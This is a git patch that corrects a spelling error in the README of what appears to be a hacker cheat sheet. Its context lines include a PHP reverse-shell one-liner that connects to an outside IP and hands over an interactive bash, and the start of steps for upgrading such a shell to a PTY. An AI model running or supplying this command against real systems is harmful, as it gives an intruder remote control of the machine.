From 2300cf1d0dbd6b75707b693118da78cc543680c3 Mon Sep 17 00:00:00 2001 From: Erjan Kalybek Date: Thu, 30 Jan 2020 15:48:02 +0100 Subject: [PATCH] Fix typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 463a435..64bb0d1 100644 --- a/README.md +++ b/README.md @@ -389,7 +389,7 @@ php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' **5.ii.a. Upgrade a reverse shell to a PTY shell** -Any of the above reverse shells are limited. For example *sudo bash* or *top* will not work. To make these work we have to upgrate the shell to a real PTY shell: +Any of the above reverse shells are limited. For example *sudo bash* or *top* will not work. To make these work we have to upgrade the shell to a real PTY shell: ``` $ script -qc /bin/bash /dev/null # Linux